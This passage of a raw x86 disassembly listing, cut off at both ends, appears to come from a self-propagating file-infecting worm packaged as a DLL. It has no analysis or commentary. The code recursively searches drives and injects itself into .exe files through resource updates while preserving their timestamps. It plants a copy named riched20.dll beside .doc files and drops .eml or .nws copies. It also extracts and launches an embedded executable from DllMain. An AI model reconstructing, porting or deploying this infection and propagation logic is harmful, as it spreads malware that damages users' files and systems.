─────────────────────────────────────────────────────────────────────────── 36173B67 36173B67 loc_36173B67: ; CODE XREF: sub_36173878+2DFj 36173B67 cmp eax, edx 36173B69 jz short loc_36173B73 36173B6B mov ebx, eax 36173B6D mov [esp+45Ch+var_44C], ecx 36173B71 jmp short loc_36173B85 36173B73 ; ─────────────────────────────────────────────────────────────────────────── 36173B73 36173B73 loc_36173B73: ; CODE XREF: sub_36173878+2F1j 36173B73 cmp [esp+45Ch+var_448], edx 36173B77 jz short loc_36173B92 36173B79 36173B79 loc_36173B79: ; CODE XREF: sub_36173878+299j 36173B79 mov ebx, [esp+45Ch+var_448] 36173B7D mov [esp+45Ch+var_44C], 130h 36173B85 36173B85 loc_36173B85: ; CODE XREF: sub_36173878+27Bj 36173B85 ; sub_36173878+2B7j ... 36173B85 cmp [esp+45Ch+var_43C], edx 36173B89 jz short loc_36173B92 36173B8B push ecx 36173B8C push [esp+460h+var_43C] 36173B90 jmp short loc_36173B97 36173B92 ; ─────────────────────────────────────────────────────────────────────────── 36173B92 36173B92 loc_36173B92: ; CODE XREF: sub_36173878+2FFj 36173B92 ; sub_36173878+311j 36173B92 push [esp+45Ch+var_44C] 36173B96 push ebx 36173B97 36173B97 loc_36173B97: ; CODE XREF: sub_36173878+318j 36173B97 mov esi, ds:UpdateResourceA 36173B9D mov edi, 804h 36173BA2 push edi 36173BA3 push 1 36173BA5 push 3 36173BA7 push ebp 36173BA8 call esi ; UpdateResourceA 36173BAA push [esp+45Ch+var_44C] 36173BAE push ebx 36173BAF push edi 36173BB0 push 2 36173BB2 push 3 36173BB4 push ebp 36173BB5 call esi ; UpdateResourceA 36173BB7 cmp [esp+45Ch+var_444], 0 36173BBC jz short loc_36173BC9 36173BBE push 8A8h 36173BC3 push [esp+460h+var_444] 36173BC7 jmp short loc_36173BCE 36173BC9 ; ─────────────────────────────────────────────────────────────────────────── 36173BC9 36173BC9 loc_36173BC9: ; CODE XREF: sub_36173878+344j 36173BC9 push [esp+45Ch+var_44C] 36173BCD push ebx 36173BCE 36173BCE loc_36173BCE: ; CODE XREF: sub_36173878+34Fj 36173BCE push edi 36173BCF push 3 36173BD1 push 3 36173BD3 push ebp 36173BD4 call esi ; 
UpdateResourceA 36173BD6 cmp [esp+45Ch+var_440], 0 36173BDB jz short loc_36173BE8 36173BDD push 0EA8h 36173BE2 push [esp+460h+var_440] 36173BE6 jmp short loc_36173BED 36173BE8 ; ─────────────────────────────────────────────────────────────────────────── 36173BE8 36173BE8 loc_36173BE8: ; CODE XREF: sub_36173878+363j 36173BE8 push [esp+45Ch+var_44C] 36173BEC push ebx 36173BED 36173BED loc_36173BED: ; CODE XREF: sub_36173878+36Ej 36173BED push edi 36173BEE push 4 36173BF0 push 3 36173BF2 push ebp 36173BF3 call esi ; UpdateResourceA 36173BF5 cmp [esp+45Ch+var_448], 0 36173BFA jz short loc_36173C07 36173BFC push 130h 36173C01 push [esp+460h+var_448] 36173C05 jmp short loc_36173C0C 36173C07 ; ─────────────────────────────────────────────────────────────────────────── 36173C07 36173C07 loc_36173C07: ; CODE XREF: sub_36173878+382j 36173C07 push [esp+45Ch+var_44C] 36173C0B push ebx 36173C0C 36173C0C loc_36173C0C: ; CODE XREF: sub_36173878+38Dj 36173C0C push edi 36173C0D push 5 36173C0F push 3 36173C11 push ebp 36173C12 call esi ; UpdateResourceA 36173C14 push [esp+45Ch+var_438] 36173C18 call ds:FreeLibrary 36173C1E xor ebp, ebp 36173C20 push ebp 36173C21 push ebp 36173C22 push 3 36173C24 push ebp 36173C25 push 1 36173C27 push 80000000h 36173C2C push [esp+474h+arg_0] 36173C33 call ds:CreateFileA 36173C39 mov ebx, eax 36173C3B push ebp 36173C3C push ebx 36173C3D call ds:GetFileSize 36173C43 mov ebp, eax 36173C45 cmp ebp, 0FFFFFFFFh 36173C48 jnz short loc_36173C58 36173C4A push ebx 36173C4B call ds:CloseHandle 36173C51 xor edi, edi 36173C53 jmp loc_36173DB7 36173C58 ; ─────────────────────────────────────────────────────────────────────────── 36173C58 36173C58 loc_36173C58: ; CODE XREF: sub_36173878+3D0j 36173C58 lea eax, [ebp+10h] 36173C5B push eax 36173C5C push 8 36173C5E push dword_3617ACB4 36173C64 call dword_3617AC74 36173C6A test eax, eax 36173C6C mov [esp+468h+var_440], eax 36173C70 jnz short loc_36173C83 36173C72 lea eax, [esp+468h+var_40C] 36173C76 push eax 36173C77 
call ds:DeleteFileA 36173C7D push ebx 36173C7E jmp loc_36173904 36173C83 ; ─────────────────────────────────────────────────────────────────────────── 36173C83 36173C83 loc_36173C83: ; CODE XREF: sub_36173878+3F8j 36173C83 lea ecx, [esp+468h+var_430] 36173C87 push 0 36173C89 push ecx 36173C8A push ebp 36173C8B push eax 36173C8C push ebx 36173C8D call ds:ReadFile 36173C93 test eax, eax 36173C95 jnz short loc_36173CB1 36173C97 lea eax, [esp+468h+var_40C] 36173C9B push eax 36173C9C call ds:DeleteFileA 36173CA2 push ebx 36173CA3 call ds:CloseHandle 36173CA9 push [esp+468h+var_440] 36173CAD 36173CAD loc_36173CAD: ; CODE XREF: sub_36173878+463j 36173CAD push 0 36173CAF jmp short loc_36173CFB 36173CB1 ; ─────────────────────────────────────────────────────────────────────────── 36173CB1 36173CB1 loc_36173CB1: ; CODE XREF: sub_36173878+41Dj 36173CB1 push ebx 36173CB2 mov ebx, ds:CloseHandle 36173CB8 call ebx ; CloseHandle 36173CBA push ebp 36173CBB mov ebp, [esp+46Ch+var_440] 36173CBF push ebp 36173CC0 push edi 36173CC1 push 66h 36173CC3 push 0Ah 36173CC5 push [esp+47Ch+var_434] 36173CC9 call esi ; UpdateResourceA 36173CCB test eax, eax 36173CCD jnz short loc_36173CDD 36173CCF lea eax, [esp+468h+var_40C] 36173CD3 push eax 36173CD4 call ds:DeleteFileA 36173CDA push ebp 36173CDB jmp short loc_36173CAD 36173CDD ; ─────────────────────────────────────────────────────────────────────────── 36173CDD 36173CDD loc_36173CDD: ; CODE XREF: sub_36173878+455j 36173CDD xor edi, edi 36173CDF push edi 36173CE0 push [esp+46Ch+var_434] 36173CE4 call ds:EndUpdateResourceA 36173CEA test eax, eax 36173CEC jnz short loc_36173D0E 36173CEE lea eax, [esp+468h+var_40C] 36173CF2 push eax 36173CF3 call ds:DeleteFileA 36173CF9 push ebp 36173CFA push edi 36173CFB 36173CFB loc_36173CFB: ; CODE XREF: sub_36173878+437j 36173CFB push dword_3617ACB4 36173D01 call dword_3617AC70 36173D07 36173D07 loc_36173D07: ; CODE XREF: sub_36173878+3Fj 36173D07 ; sub_36173878+58j ... 
36173D07 xor eax, eax 36173D09 jmp loc_36173DC4 36173D0E ; ─────────────────────────────────────────────────────────────────────────── 36173D0E 36173D0E loc_36173D0E: ; CODE XREF: sub_36173878+474j 36173D0E push ebp 36173D0F push edi 36173D10 push dword_3617ACB4 36173D16 call dword_3617AC70 36173D1C mov esi, [esp+474h+var_14] 36173D23 push edi 36173D24 push edi 36173D25 push 3 36173D27 push edi 36173D28 push 1 36173D2A push 80000000h 36173D2F push esi 36173D30 call ds:CreateFileA 36173D36 mov ebp, eax 36173D38 cmp ebp, 0FFFFFFFFh 36173D3B jz short loc_36173DB7 36173D3D lea eax, [esp+474h+var_420] 36173D41 push eax 36173D42 lea eax, [esp+478h+var_430] 36173D46 push eax 36173D47 lea eax, [esp+47Ch+var_428] 36173D4B push eax 36173D4C push ebp 36173D4D call ds:GetFileTime 36173D53 push ebp 36173D54 call ebx ; CloseHandle 36173D56 push edi 36173D57 push edi 36173D58 push 3 36173D5A push edi 36173D5B push edi 36173D5C lea eax, [esp+478h+var_408] 36173D60 push 40000000h 36173D65 push eax 36173D66 call ds:CreateFileA 36173D6C mov ebp, eax 36173D6E cmp ebp, 0FFFFFFFFh 36173D71 jz short loc_36173DB7 36173D73 lea eax, [esp+464h+var_410] 36173D77 push eax 36173D78 lea eax, [esp+468h+var_420] 36173D7C push eax 36173D7D lea eax, [esp+46Ch+var_418] 36173D81 push eax 36173D82 push ebp 36173D83 call ds:SetFileTime 36173D89 push ebp 36173D8A call ebx ; CloseHandle 36173D8C push esi 36173D8D call ds:GetFileAttributesA 36173D93 mov ebx, ds:SetFileAttributesA 36173D99 push 80h 36173D9E push esi 36173D9F mov ebp, eax 36173DA1 call ebx ; SetFileAttributesA 36173DA3 push edi 36173DA4 lea eax, [esp+46Ch+var_40C] 36173DA8 push esi 36173DA9 push eax 36173DAA call ds:CopyFileA 36173DB0 push ebp 36173DB1 push esi 36173DB2 call ebx ; SetFileAttributesA 36173DB4 push 1 36173DB6 pop edi 36173DB7 36173DB7 loc_36173DB7: ; CODE XREF: sub_36173878+145j 36173DB7 ; sub_36173878+16Aj ... 
36173DB7 lea eax, [esp+468h+var_40C] 36173DBB push eax 36173DBC call ds:DeleteFileA 36173DC2 mov eax, edi 36173DC4 36173DC4 loc_36173DC4: ; CODE XREF: sub_36173878+491j 36173DC4 pop edi 36173DC5 pop esi 36173DC6 pop ebp 36173DC7 pop ebx 36173DC8 add esp, 44Ch 36173DCE retn 36173DCE sub_36173878 endp ; sp = -0Ch 36173DCE 36173DCF 36173DCF ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173DCF 36173DCF ; Attributes: bp-based frame 36173DCF 36173DCF sub_36173DCF proc near ; CODE XREF: sub_36173DCF+108p 36173DCF ; sub_36173DCF+2D4p ... 36173DCF 36173DCF var_16C = dword ptr -16Ch 36173DCF var_150 = byte ptr -150h 36173DCF var_128 = byte ptr -128h 36173DCF var_124 = byte ptr -124h 36173DCF var_10 = dword ptr -10h 36173DCF var_C = dword ptr -0Ch 36173DCF var_8 = dword ptr -8 36173DCF var_4 = dword ptr -4 36173DCF arg_0 = dword ptr 8 36173DCF 36173DCF push ebp 36173DD0 mov ebp, esp 36173DD2 sub esp, 150h 36173DD8 push ebx 36173DD9 push esi 36173DDA mov esi, 400h 36173DDF push edi 36173DE0 push esi 36173DE1 push 8 36173DE3 push dword_3617ACB4 36173DE9 xor edi, edi 36173DEB mov [ebp+var_C], edi 36173DEE mov [ebp+var_4], edi 36173DF1 mov [ebp+var_8], edi 36173DF4 call dword_3617AC74 36173DFA mov ebx, eax 36173DFC cmp ebx, edi 36173DFE jnz short loc_36173E07 36173E00 xor eax, eax 36173E02 jmp loc_36174120 36173E07 ; ─────────────────────────────────────────────────────────────────────────── 36173E07 36173E07 loc_36173E07: ; CODE XREF: sub_36173DCF+2Fj 36173E07 push esi 36173E08 push [ebp+arg_0] 36173E0B push ebx 36173E0C call ds:strncpy 36173E12 push ebx 36173E13 call sub_3617186E 36173E18 push [ebp+arg_0] 36173E1B call _strlen 36173E20 mov edi, ds:strncat 36173E26 mov ecx, esi 36173E28 sub ecx, eax 36173E2A push ecx 36173E2B push offset a_ ; "\\*.*" 36173E30 push ebx 36173E31 call edi ; strncat 36173E33 add esp, 20h 36173E36 lea eax, [ebp+var_150] 36173E3C push eax 36173E3D push ebx 36173E3E call ds:FindFirstFileA 36173E44 cmp eax, 0FFFFFFFFh 
36173E47 mov [ebp+var_10], eax 36173E4A jnz short loc_36173E60 36173E4C push ebx 36173E4D push 0 36173E4F push dword_3617ACB4 36173E55 call dword_3617AC70 36173E5B jmp loc_3617411D 36173E60 ; ─────────────────────────────────────────────────────────────────────────── 36173E60 36173E60 loc_36173E60: ; CODE XREF: sub_36173DCF+7Bj 36173E60 lea eax, [ebp+var_124] 36173E66 push eax 36173E67 call ds:_strlwr 36173E6D lea eax, [ebp+var_124] 36173E73 mov [esp+16Ch+var_16C], offset dot ; "." 36173E7A push eax 36173E7B call _strcmp 36173E80 pop ecx 36173E81 test eax, eax 36173E83 pop ecx 36173E84 jz loc_3617400D 36173E8A lea eax, [ebp+var_124] 36173E90 push offset a__ ; ".." 36173E95 push eax 36173E96 call _strcmp 36173E9B pop ecx 36173E9C test eax, eax 36173E9E pop ecx 36173E9F jz loc_3617400D 36173EA5 test [ebp+var_150], 10h 36173EAC jz short loc_36173EE4 36173EAE push ebx 36173EAF call _strlen 36173EB4 mov ecx, esi 36173EB6 sub ecx, eax 36173EB8 push ecx 36173EB9 push offset asc_36179474 ; "\\" 36173EBE push ebx 36173EBF call edi ; strncat 36173EC1 push ebx 36173EC2 call _strlen 36173EC7 mov ecx, esi 36173EC9 sub ecx, eax 36173ECB lea eax, [ebp+var_124] 36173ED1 push ecx 36173ED2 push eax 36173ED3 push ebx 36173ED4 call edi ; strncat 36173ED6 push ebx 36173ED7 call sub_36173DCF 36173EDC add esp, 24h 36173EDF jmp loc_3617400D 36173EE4 ; ─────────────────────────────────────────────────────────────────────────── 36173EE4 36173EE4 loc_36173EE4: ; CODE XREF: sub_36173DCF+DDj 36173EE4 ; sub_36173DCF+29Aj 36173EE4 lea eax, [ebp+var_124] 36173EEA push eax 36173EEB call _strlen 36173EF0 cmp eax, 4 36173EF3 pop ecx 36173EF4 jbe loc_3617400D 36173EFA lea eax, [ebp+var_124] 36173F00 push offset dot_exe ; ".exe" 36173F05 push eax 36173F06 call _strlen 36173F0B pop ecx 36173F0C lea eax, [ebp+eax+var_128] 36173F13 push eax 36173F14 call _strcmp 36173F19 pop ecx 36173F1A test eax, eax 36173F1C pop ecx 36173F1D jnz short loc_36173F6E 36173F1F push esi 36173F20 push [ebp+arg_0] 36173F23 
push ebx 36173F24 call ds:strncpy 36173F2A push ebx 36173F2B call _strlen 36173F30 mov ecx, esi 36173F32 sub ecx, eax 36173F34 push ecx 36173F35 push offset asc_36179474 ; "\\" 36173F3A push ebx 36173F3B call edi ; strncat 36173F3D push ebx 36173F3E call _strlen 36173F43 mov ecx, esi 36173F45 sub ecx, eax 36173F47 lea eax, [ebp+var_124] 36173F4D push ecx 36173F4E push eax 36173F4F push ebx 36173F50 call edi ; strncat 36173F52 add esp, 2Ch 36173F55 cmp dword_3617ACB0, 0 36173F5C jz loc_3617400D 36173F62 push ebx 36173F63 call sub_36173878 36173F68 pop ecx 36173F69 jmp loc_3617400D 36173F6E ; ─────────────────────────────────────────────────────────────────────────── 36173F6E 36173F6E loc_36173F6E: ; CODE XREF: sub_36173DCF+14Ej 36173F6E lea eax, [ebp+var_124] 36173F74 push offset dot_doc ; ".doc" 36173F79 push eax 36173F7A call _strlen 36173F7F pop ecx 36173F80 lea eax, [ebp+eax+var_128] 36173F87 push eax 36173F88 call _strcmp 36173F8D pop ecx 36173F8E test eax, eax 36173F90 pop ecx 36173F91 jnz short loc_36173F9C 36173F93 mov [ebp+var_C], 1 36173F9A jmp short loc_3617400D 36173F9C ; ─────────────────────────────────────────────────────────────────────────── 36173F9C 36173F9C loc_36173F9C: ; CODE XREF: sub_36173DCF+1C2j 36173F9C lea eax, [ebp+var_124] 36173FA2 push offset dot_eml ; ".eml" 36173FA7 push eax 36173FA8 call _strlen 36173FAD pop ecx 36173FAE lea eax, [ebp+eax+var_128] 36173FB5 push eax 36173FB6 call _strcmp 36173FBB pop ecx 36173FBC test eax, eax 36173FBE pop ecx 36173FBF jz short loc_36173FE6 36173FC1 lea eax, [ebp+var_124] 36173FC7 push offset dot_nws ; ".nws" 36173FCC push eax 36173FCD call _strlen 36173FD2 pop ecx 36173FD3 lea eax, [ebp+eax+var_128] 36173FDA push eax 36173FDB call _strcmp 36173FE0 pop ecx 36173FE1 test eax, eax 36173FE3 pop ecx 36173FE4 jnz short loc_36173FEF 36173FE6 36173FE6 loc_36173FE6: ; CODE XREF: sub_36173DCF+1F0j 36173FE6 mov [ebp+var_4], 1 36173FED jmp short loc_3617400D 36173FEF ; 
─────────────────────────────────────────────────────────────────────────── 36173FEF 36173FEF loc_36173FEF: ; CODE XREF: sub_36173DCF+215j 36173FEF lea eax, [ebp+var_124] 36173FF5 push offset RICHED20_DLL ; "riched20.dll" 36173FFA push eax 36173FFB call _strcmp 36174000 pop ecx 36174001 test eax, eax 36174003 pop ecx 36174004 jnz short loc_3617400D 36174006 mov [ebp+var_8], 1 3617400D 3617400D loc_3617400D: ; CODE XREF: sub_36173DCF+B5j 3617400D ; sub_36173DCF+D0j ... 3617400D lea eax, [ebp+var_150] 36174013 push eax 36174014 push [ebp+var_10] 36174017 call ds:FindNextFileA 3617401D test eax, eax 3617401F jz loc_361740B0 36174025 lea eax, [ebp+var_124] 3617402B push eax 3617402C call ds:_strlwr 36174032 lea eax, [ebp+var_124] 36174038 mov [esp+16Ch+var_16C], offset dot ; "." 3617403F push eax 36174040 call _strcmp 36174045 pop ecx 36174046 test eax, eax 36174048 pop ecx 36174049 jz short loc_3617400D 3617404B lea eax, [ebp+var_124] 36174051 push offset a__ ; ".." 36174056 push eax 36174057 call _strcmp 3617405C pop ecx 3617405D test eax, eax 3617405F pop ecx 36174060 jz short loc_3617400D 36174062 test [ebp+var_150], 10h 36174069 jz loc_36173EE4 3617406F push esi 36174070 push [ebp+arg_0] 36174073 push ebx 36174074 call ds:strncpy 3617407A push ebx 3617407B call _strlen 36174080 mov ecx, esi 36174082 sub ecx, eax 36174084 push ecx 36174085 push offset asc_36179474 ; "\\" 3617408A push ebx 3617408B call edi ; strncat 3617408D push ebx 3617408E call _strlen 36174093 mov ecx, esi 36174095 sub ecx, eax 36174097 lea eax, [ebp+var_124] 3617409D push ecx 3617409E push eax 3617409F push ebx 361740A0 call edi ; strncat 361740A2 push ebx 361740A3 call sub_36173DCF 361740A8 add esp, 30h 361740AB jmp loc_3617400D 361740B0 ; ─────────────────────────────────────────────────────────────────────────── 361740B0 361740B0 loc_361740B0: ; CODE XREF: sub_36173DCF+250j 361740B0 push [ebp+var_10] 361740B3 call ds:FindClose 361740B9 xor esi, esi 361740BB push ebx 361740BC push esi 
361740BD push dword_3617ACB4 361740C3 call dword_3617AC70 361740C9 cmp dword_3617ACB0, esi 361740CF jz short loc_361740FB 361740D1 cmp [ebp+var_C], 1 361740D5 jnz short loc_361740EC 361740D7 cmp [ebp+var_8], esi 361740DA push [ebp+arg_0] 361740DD jnz short loc_361740E6 361740DF call sub_3617430F 361740E4 jmp short loc_361740EB 361740E6 ; ─────────────────────────────────────────────────────────────────────────── 361740E6 361740E6 loc_361740E6: ; CODE XREF: sub_36173DCF+30Ej 361740E6 call sub_3617442D 361740EB 361740EB loc_361740EB: ; CODE XREF: sub_36173DCF+315j 361740EB pop ecx 361740EC 361740EC loc_361740EC: ; CODE XREF: sub_36173DCF+306j 361740EC cmp [ebp+var_4], esi 361740EF push [ebp+arg_0] 361740F2 jz short loc_36174117 361740F4 call sub_3617455C 361740F9 jmp short loc_3617411C 361740FB ; ─────────────────────────────────────────────────────────────────────────── 361740FB 361740FB loc_361740FB: ; CODE XREF: sub_36173DCF+300j 361740FB cmp [ebp+var_C], 1 361740FF jnz short loc_3617410F 36174101 cmp [ebp+var_8], esi 36174104 jnz short loc_3617410F 36174106 push [ebp+arg_0] 36174109 call sub_3617430F 3617410E pop ecx 3617410F 3617410F loc_3617410F: ; CODE XREF: sub_36173DCF+330j 3617410F ; sub_36173DCF+335j 3617410F cmp [ebp+var_4], esi 36174112 jnz short loc_3617411D 36174114 push [ebp+arg_0] 36174117 36174117 loc_36174117: ; CODE XREF: sub_36173DCF+323j 36174117 call sub_36174374 3617411C 3617411C loc_3617411C: ; CODE XREF: sub_36173DCF+32Aj 3617411C pop ecx 3617411D 3617411D loc_3617411D: ; CODE XREF: sub_36173DCF+8Cj 3617411D ; sub_36173DCF+343j 3617411D push 1 3617411F pop eax 36174120 36174120 loc_36174120: ; CODE XREF: sub_36173DCF+33j 36174120 pop edi 36174121 pop esi 36174122 pop ebx 36174123 leave 36174124 retn 36174124 sub_36173DCF endp 36174124 36174125 36174125 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174125 36174125 ; Attributes: bp-based frame 36174125 36174125 sub_36174125 proc near ; CODE XREF: 
_DllMain@12+C8p 36174125 36174125 var_C64 = byte ptr -0C64h 36174125 var_864 = byte ptr -864h 36174125 var_861 = byte ptr -861h 36174125 var_464 = byte ptr -464h 36174125 var_64 = dword ptr -64h 36174125 var_34 = word ptr -34h 36174125 var_20 = byte ptr -20h 36174125 var_10 = byte ptr -10h 36174125 var_C = dword ptr -0Ch 36174125 var_8 = dword ptr -8 36174125 var_4 = dword ptr -4 36174125 36174125 push ebp 36174126 mov ebp, esp 36174128 sub esp, 0C64h 3617412E push ebx 3617412F push esi 36174130 push edi 36174131 push offset aDontrunold ; "dontrunold" 36174136 push offset byte_3617CCB8 3617413B call ds:strstr 36174141 pop ecx 36174142 test eax, eax 36174144 pop ecx 36174145 jnz loc_36174245 3617414B xor ebx, ebx 3617414D push 2 3617414F push ebx 36174150 push offset byte_3617C0B8 36174155 call ds:LoadLibraryExA 3617415B mov edi, eax 3617415D push 0Ah 3617415F push 66h 36174161 push edi 36174162 call ds:FindResourceA 36174168 push eax 36174169 push edi 3617416A mov [ebp+var_4], eax 3617416D call ds:LoadResource 36174173 push eax 36174174 call ds:LockResource 3617417A push [ebp+var_4] 3617417D mov esi, ds:SizeofResource 36174183 mov [ebp+var_C], eax 36174186 push edi 36174187 call esi ; SizeofResource 36174189 cmp eax, 64h 3617418C jb loc_3617423E 36174192 lea eax, [ebp+var_864] 36174198 push offset byte_3617C0B8 3617419D push eax 3617419E call _strcpy 361741A3 pop ecx 361741A4 lea eax, [ebp+var_864] 361741AA pop ecx 361741AB mov [ebp+var_861], bl 361741B1 push eax 361741B2 call ds:GetDriveTypeA 361741B8 cmp eax, 3 361741BB jnz short loc_36174222 361741BD lea eax, [ebp+var_C64] 361741C3 push offset byte_3617B8B8 361741C8 push eax 361741C9 call _strcpy 361741CE lea eax, [ebp+var_464] 361741D4 push offset byte_3617BCB8 361741D9 push eax 361741DA call _strcpy 361741DF lea eax, [ebp+var_C64] 361741E5 push 2Eh 361741E7 push eax 361741E8 call ds:strchr 361741EE push offset spacedot_exe ; " .exe" 361741F3 push eax 361741F4 call _strcpy 361741F9 lea eax, [ebp+var_464] 
361741FF push offset asc_36179474 ; "\\" 36174204 push eax 36174205 call _strcat 3617420A lea eax, [ebp+var_C64] 36174210 push eax 36174211 lea eax, [ebp+var_464] 36174217 push eax 36174218 call _strcat 3617421D add esp, 30h 36174220 jmp short loc_3617426C 36174222 ; ─────────────────────────────────────────────────────────────────────────── 36174222 36174222 loc_36174222: ; CODE XREF: sub_36174125+96j 36174222 lea eax, [ebp+var_464] 36174228 push eax 36174229 push ebx 3617422A push offset mep ; "mep" 3617422F push offset byte_3617B4B8 36174234 call ds:GetTempFileNameA 3617423A test eax, eax 3617423C jnz short loc_3617424C 3617423E 3617423E loc_3617423E: ; CODE XREF: sub_36174125+67j 3617423E push edi 3617423F call ds:FreeLibrary 36174245 36174245 loc_36174245: ; CODE XREF: sub_36174125+20j 36174245 xor eax, eax 36174247 jmp loc_3617430A 3617424C ; ─────────────────────────────────────────────────────────────────────────── 3617424C 3617424C loc_3617424C: ; CODE XREF: sub_36174125+117j 3617424C lea eax, [ebp+var_464] 36174252 push eax 36174253 call ds:DeleteFileA 36174259 lea eax, [ebp+var_464] 3617425F push offset dot_exe ; ".exe" 36174264 push eax 36174265 call _strcat 3617426A pop ecx 3617426B pop ecx 3617426C 3617426C loc_3617426C: ; CODE XREF: sub_36174125+FBj 3617426C push ebx 3617426D push 26h 3617426F push 2 36174271 push ebx 36174272 push ebx 36174273 lea eax, [ebp+var_464] 36174279 push 40000000h 3617427E push eax 3617427F call ds:CreateFileA 36174285 mov [ebp+var_8], eax 36174288 lea eax, [ebp+var_10] 3617428B push ebx 3617428C push eax 3617428D push [ebp+var_4] 36174290 push edi 36174291 call esi ; SizeofResource 36174293 push eax 36174294 push [ebp+var_C] 36174297 push [ebp+var_8] 3617429A call ds:WriteFile 361742A0 push [ebp+var_8] 361742A3 call ds:CloseHandle 361742A9 push edi 361742AA call ds:FreeLibrary 361742B0 push 44h 361742B2 lea eax, [ebp+var_64] 361742B5 pop esi 361742B6 push esi 361742B7 push ebx 361742B8 push eax 361742B9 call _memset 
361742BE push 10h 361742C0 lea eax, [ebp+var_20] 361742C3 push ebx 361742C4 push eax 361742C5 call _memset 361742CA add esp, 18h 361742CD lea eax, [ebp+var_20] 361742D0 mov [ebp+var_64], esi 361742D3 mov [ebp+var_34], 0Ah 361742D9 push eax 361742DA lea eax, [ebp+var_64] 361742DD push eax 361742DE push offset byte_3617D0B8 361742E3 push ebx 361742E4 push ebx 361742E5 push ebx 361742E6 push ebx 361742E7 push ebx 361742E8 lea eax, [ebp+var_464] 361742EE push offset byte_3617CCB8 361742F3 push eax 361742F4 call ds:CreateProcessA 361742FA lea eax, [ebp+var_464] 36174300 push eax 36174301 call sub_36171899 36174306 pop ecx 36174307 push 1 36174309 pop eax 3617430A 3617430A loc_3617430A: ; CODE XREF: sub_36174125+122j 3617430A pop edi 3617430B pop esi 3617430C pop ebx 3617430D leave 3617430E retn 3617430E sub_36174125 endp 3617430E 3617430F 3617430F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617430F 3617430F ; Attributes: bp-based frame 3617430F 3617430F sub_3617430F proc near ; CODE XREF: sub_36173DCF+310p 3617430F ; sub_36173DCF+33Ap ... 
3617430F var_400 = byte ptr -400h
3617430F arg_0 = dword ptr 8
3617430F push ebp
36174310 mov ebp, esp
36174312 sub esp, 400h
36174318 push [ebp+arg_0]
3617431B lea eax, [ebp+var_400]
36174321 push eax
36174322 call _strcpy
36174327 lea eax, [ebp+var_400]
3617432D push offset asc_36179474 ; "\\"
36174332 push eax
36174333 call _strcat
36174338 lea eax, [ebp+var_400]
3617433E push offset RICHED20_DLL ; "riched20.dll"
36174343 push eax
36174344 call _strcat
36174349 add esp, 18h
3617434C lea eax, [ebp+var_400]
36174352 push 0
36174354 push eax
36174355 push offset byte_3617C4B8
3617435A call ds:CopyFileA
36174360 lea eax, [ebp+var_400]
36174366 push 26h
36174368 push eax
36174369 call ds:SetFileAttributesA
3617436F push 1
36174371 pop eax
36174372 leave
36174373 retn
36174373 sub_3617430F endp

36174374 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36174374 ; Attributes: bp-based frame
36174374 sub_36174374 proc near ; CODE XREF: sub_36173DCF+348p
36174374 ; sub_3617455C+240p
36174374 var_400 = byte ptr -400h
36174374 arg_0 = dword ptr 8
36174374 push ebp
36174375 mov ebp, esp
36174377 sub esp, 400h
3617437D push esi
3617437E call sub_36171A7B
36174383 mov esi, offset byte_3617A818
36174388 push 2Eh
3617438A push esi
3617438B call ds:strchr
36174391 pop ecx
36174392 test eax, eax
36174394 pop ecx
36174395 jz short loc_3617439A
36174397 and byte ptr [eax], 0
3617439A loc_3617439A: ; CODE XREF: sub_36174374+21j
3617439A push 400h
3617439F lea eax, [ebp+var_400]
361743A5 push [ebp+arg_0]
361743A8 push eax
361743A9 call ds:strncpy
361743AF lea eax, [ebp+var_400]
361743B5 push offset asc_36179474 ; "\\"
361743BA push eax
361743BB call _strcat
361743C0 lea eax, [ebp+var_400]
361743C6 push esi
361743C7 push eax
361743C8 call _strcat
361743CD add esp, 1Ch
361743D0 call ds:rand
361743D6 imul eax, 64h
361743D9 cdq
361743DA mov ecx, 7FFFh
361743DF pop esi
361743E0 idiv ecx
361743E2 inc eax
361743E3 cmp eax, 5Fh
361743E6 jle short use_eml_ext
361743E8 push offset dot_nws ; ".nws"
361743ED jmp short loc_361743F4
361743EF ; ───────────────────────────────────────────────────────────────────────────
361743EF use_eml_ext: ; CODE XREF: sub_36174374+72j
361743EF push offset dot_eml ; ".eml"
361743F4 loc_361743F4: ; CODE XREF: sub_36174374+79j
361743F4 lea eax, [ebp+var_400]
361743FA push eax
361743FB call _strcat
36174400 pop ecx
36174401 lea eax, [ebp+var_400]
36174407 pop ecx
36174408 push 0
3617440A push eax
3617440B push offset byte_3617C8B8
36174410 call ds:CopyFileA
36174416 lea eax, [ebp+var_400]
3617441C push 80h
36174421 push eax
36174422 call ds:SetFileAttributesA
36174428 push 1
3617442A pop eax
3617442B leave
3617442C retn
3617442C sub_36174374 endp

3617442D ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
3617442D ; Attributes: bp-based frame
3617442D sub_3617442D proc near ; CODE XREF: sub_36173DCF+317p
3617442D var_8 = dword ptr -8
3617442D var_4 = dword ptr -4
3617442D arg_0 = dword ptr 8
3617442D push ebp
3617442E mov ebp, esp
36174430 push ecx
36174431 push ecx
36174432 push ebx
36174433 push esi
36174434 xor esi, esi
36174436 push edi
36174437 mov edi, ds:CreateFileA
3617443D push esi
3617443E push esi
3617443F push 3
36174441 push esi
36174442 mov ebx, 80000000h
36174447 push 7
36174449 push ebx
3617444A push offset byte_3617C4B8
3617444F call edi ; CreateFileA
36174451 cmp eax, 0FFFFFFFFh
36174454 mov [ebp+var_4], eax
36174457 jz loc_36174506
3617445D push esi
3617445E push eax
3617445F call ds:GetFileSize
36174465 push [ebp+var_4]
36174468 cmp eax, 0FFFFFFFFh
3617446B mov [ebp+var_8], eax
3617446E jz loc_36174500
36174474 call ds:CloseHandle
3617447A push 400h
3617447F push 8
36174481 push dword_3617ACB4
36174487 call dword_3617AC74
3617448D push [ebp+arg_0]
36174490 cmp eax, esi
36174492 mov [ebp+var_4], eax
36174495 jz short loc_36174509
36174497 push eax
36174498 call _strcpy
3617449D push offset asc_36179474 ; "\\"
361744A2 push [ebp+var_4]
361744A5 call _strcat
361744AA push offset RICHED20_DLL ; "riched20.dll"
361744AF push [ebp+var_4]
361744B2 call _strcat
361744B7 add esp, 18h
361744BA push esi
361744BB push esi
361744BC push 3
361744BE push esi
361744BF push 7
361744C1 push ebx
361744C2 push [ebp+var_4]
361744C5 call edi ; CreateFileA
361744C7 mov edi, eax
361744C9 cmp edi, 0FFFFFFFFh
361744CC jnz short loc_361744E0
361744CE push [ebp+var_4]
361744D1 push esi
